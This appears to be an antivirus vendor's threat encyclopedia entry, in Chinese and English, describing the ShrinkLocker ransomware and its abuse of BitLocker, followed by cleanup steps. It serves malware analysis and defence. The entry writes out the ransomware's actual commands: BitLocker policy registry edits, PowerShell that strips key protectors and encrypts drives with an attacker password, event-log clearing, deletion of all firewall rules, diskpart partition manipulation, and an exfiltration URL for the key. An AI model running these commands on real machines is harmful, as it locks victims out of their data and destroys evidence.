Ransom.VBS.SHRINKLOCKER.RG
Generic.VBS.ShrinkLocker.A.EABA5996 (BITDEFENDER)
Windows

恶意软件类型:
Ransomware
有破坏性?:
没有
加密?:
没有
In the Wild:
是的
概要
它以文件的形式出现在系统中,可能是其他恶意软件投放的,或者是用户在访问恶意网站时无意中下载的。
技术详细信息
新病毒详细信息
它以文件的形式出现在系统中,可能是其他恶意软件投放的,或者是用户在访问恶意网站时无意中下载的。
安装
它添加下列进程:
- bcdboot {Boot Drive}:\windows /s {New Drive} → reinstall the boot files on the new primary partitions
- reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
- reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v scforceoption /t REG_DWORD /d 1 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseAdvancedStartup /t REG_DWORD /d 1 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPM /t REG_DWORD /d 2 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMPIN /t REG_DWORD /d 2 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKey /t REG_DWORD /d 2 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKeyPIN /t REG_DWORD /d 2 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableNonTPM /t REG_DWORD /d 1 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePartialEncryptionKey /t REG_DWORD /d 2 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePIN /t REG_DWORD /d 2 /f
- ServerManagerCmd -install BitLocker -allSubFeatures
- powershell.exe -Command Install-WindowsFeature BitLocker -IncludeAllSubFeature -IncludeManagementTools
- powershell.exe -Command "$protectors = (Get-BitLockerVolume -MountPoint {Target Drive}).KeyProtector; if ($protectors -ne $null) { foreach ($protector in $protectors) { Remove-BitLockerKeyProtector -MountPoint {Target Drive} -KeyProtectorId $protector.KeyProtectorId } }"
- powershell.exe -Command $a=ConvertTo-SecureString "'{Bitlocker Paassword}'" -asplaintext -force;Enable-BitLocker {Target Drive} -s -qe -pwp -pw $a
- powershell.exe -Command Resume-BitLocker -MountPoint {Target Drive}
- wevtutil -cl "Windows PowerShell"
- netsh advfirewall set allprofiles state on
- netsh advfirewall firewall delet rule name=all
- schtasks /Delete /TN "copy" /F
- schtasks /Delete /TN "disk" /F
其他系统修改
它添加下列注册表项:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Control\Terminal Server
fDenyTSConnections = 1
(Note: The default value data of the said registry entry is 1.)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
scforceoption = 1
(Note: The default value data of the said registry entry is 0.)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseAdvancedStartup = 1
(Note: The default value data of the said registry entry is {User-defined value}.)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
EnableBDEWithNoTPM = 1
(Note: The default value data of the said registry entry is 0.)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPM = 2
(Note: The default value data of the said registry entry is 0.)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPMPIN = 2
(Note: The default value data of the said registry entry is 0.)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPMKey = 2
(Note: The default value data of the said registry entry is 0.)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPMKeyPIN = 2
(Note: The default value data of the said registry entry is 0.)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
EnableNonTPM = 1
(Note: The default value data of the said registry entry is 0.)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UsePartialEncryptionKey = 2
(Note: The default value data of the said registry entry is {User-defined value}.)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UsePIN = 2
(Note: The default value data of the said registry entry is 0.)
信息窃取
它收集下列数据:
- Hard Drive Used Space
- Hard Drive Free Space
- Hard Drive Label
- Total RAM
- Used RAM
- Available RAM
- Computer Name
- Available Fixed Drives
- Generated Bitlocker Encryption Key
- Network Performance
窃取信息
它通过 HTTP POST 将收集的信息发送到下列 URL:
- https://{BLOCKED}ted-eating-meals-top.trycloudflare.com/updatelog
其他详细信息
该程序执行以下操作:
- It terminates itself if the current domain is different from its target domain.
- It terminates and deletes itself if the name of the operating system contains “xp”, “2000”, “2003”, or “vista”.
- It issues the following commands to diskpart to do the following:
- Shrink the size of non-boot partitions by 100 MB
- Select Volume {Target Drive}
- shrink desired=100
- exit
- Split the unallocated space into new 100 MB primary partitions. Format these partitions with the override parameter, assign a file system and a drive letter to each. Activate these partitions.
- Select Volume {Target Drive}
- create partition primary size=100
- format quick recommended override
- assign
- active
- exit
- Remove the drive letter from the selected partition.
- Select Volume {New Drive}
- remove
- exit
- Shrink the size of non-boot partitions by 100 MB
- It starts the BitLocker Drive Encryption Service (BDESVC) if it is not running.
- It changes the boot drive label into the attacker’s email.
- It deletes the following files if the computer name is "MWIDC001":
- \\{Target Domain Name}\SYSVOL\{Target Domain Name}\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
- \\{Target Domain Name}\SYSVOL\{Target Domain Name}\scripts\Logon.vbs
- \\{Target Domain Name}\SYSVOL\{Target Domain Name}\scripts\disk.vbs
- It disables BitLocker's encryption key protector and deletes them. It then allows for a numerical password to be used as a protector and for encryption to be turned on.
- It generates a random encryption key for Bitlocker using the following information as seed:
- Pre-specified characters
- Hard Drive Used Space
- Hard Drive Free Space
- Total RAM
- Used RAM
- Available RAM
- Network Performance
- It enables Bitlocker on the drives found in the affected machine using its generated encryption key.
- It shows the following prompt when the affected machine reboots:
解决方案
Step 1
对于Windows ME和XP用户,在扫描前,请确认已禁用系统还原功能,才可全面扫描计算机。
Step 2
从备份中恢复加密文件。
Step 3
使用亚信安全产品扫描计算机,并删除检测到的Ransom.VBS.SHRINKLOCKER.RG文件 如果检测到的文件已被亚信安全产品清除、删除或隔离,则无需采取进一步措施。可以选择直接删除隔离的文件。请参阅知识库页面了解详细信息。